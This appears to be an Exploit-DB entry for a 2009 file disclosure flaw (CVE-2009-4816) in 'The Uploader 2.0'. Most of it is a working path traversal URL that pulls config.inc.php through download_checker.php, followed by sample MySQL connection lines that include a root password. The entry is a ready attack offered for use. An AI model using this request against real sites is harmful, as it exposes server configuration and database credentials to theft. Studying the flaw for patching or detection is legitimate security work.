The Uploader 2.0 File Disclosure Vulnerability
| EDB-ID: 10599 | CVE: 2009-4816 | OSVDB-ID: 61270 |
| Author: Stack | Published: 2009-12-22 | Verified:  |
Exploit Code:  | Vulnerable App: N/A |
Rating |
| EDB-ID: 10599 | CVE: 2009-4816 | OSVDB-ID: 61270 |
| Author: Stack | Published: 2009-12-22 | Verified: |
| Exploit Code: | Vulnerable App: N/A |
Rating |
# Title: The Uploader 2.0 Remote File disclosure Vulnerability # Author: Stack http://server/the_uploader/api/download_checker.php?filename=../config.inc.php next open the config.inc.php file and you got the MySQL configuration ( user & password ) :d //MySQL configuration and connection functions $main['host']="127.0.0.1"; $main['user']="root"; $main['pass']="jH445Ui"; $main['dbnm']="jkL_database";